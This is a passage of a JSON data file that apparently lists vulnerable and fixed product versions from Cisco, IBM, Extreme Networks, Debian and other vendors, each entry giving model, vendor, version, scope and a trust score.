"model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.17.0" }, { "model": "unified wireless ip phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.5.1" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "virtual security gateway vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.0" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "webex meetings client on premises", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "spa51x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "telepresence server on virtual machine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.9.1" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual fabric 10gb switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.16" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "protectier entry edition ts7610 ts7620", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-/3.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.0" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.7.0" }, { "model": "webex meetings for wp8", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2.1)" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1" }, { "model": "physical access control gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.7" }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "identifi v7r0", "scope": null, "trust": 0.3, "vendor": "extremenetworks", "version": null }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.10" }, { "model": "application and content networking system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.41" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.4.1.0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "intelligent automation for cloud", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0.9.8" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.7-" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "edge digital media player 1.6rb4 5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mds series multilayer switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.8" }, { "model": "protectier enterprise edition ts7650g", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-2.5" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "partner supporting service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "1/10gb uplink ethernet switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.14.0" }, { "model": "protectier appliance edition ts7650ap1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.2" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.11" }, { "model": "mobility services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.0" }, { "model": "edge digital media player", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3401.2.0.20" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa30x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "identifi", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "9.21.12" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.17.0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.2" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.4.7" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.5" }, { "model": "mq appliance m2001", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ironport email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.112" }, { "model": "meetingplace", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "spa525g", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.4.4" }, { "model": "lancope stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.8" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "cognos business intelligence fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.12" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller 1.0.3394m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network controller 1.0.3381m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.1.5" }, { "model": "registered envelope service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "telepresence content server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(4)" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "image construction and composition tool build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.050" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "mq appliance m2000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asa cx and prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.21" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "rackswitch g8264cs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.14.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50007.3.1" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(3)" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.9-" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8945" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.18-49" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1.10000.12)" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.3" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "eos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "7.91.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.13-41" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "xenserver", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.0.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network admission control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0(0.400)" }, { "model": "protectier enterprise edition ts7650g", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.1" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "protectier entry edition ts7610 ts7620", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-/2.5" }, { "model": "telepresence conductor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.115" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.13" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.6)" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "unified communications manager 10.5 su3", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "protectier entry edition ts7610 ts7620", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-/3.3" }, { "model": "protectier enterprise edition ts7650g", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.4" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9-34" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "22.1" }, { "model": "abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "security proventia network active bypass 0343c3c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "unified ip phones 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11.0(0.98000.225)" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "protectier gateway for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.3" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "unity connection", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "rackswitch g8316", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.17.0" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.98991.13)" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.6.4" }, { "model": "xenserver", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "prime optical for sps", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6" }, { "model": "protectier enterprise edition ts7650g", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-2.4" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.3" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50008.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.1" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.3" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server ssl gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "protectier appliance edition ts7650ap1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-2.4" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.10000.5)" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "prime license manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "protectier entry edition ts7610 ts7620", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-/1.2" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-42" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3500-" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { 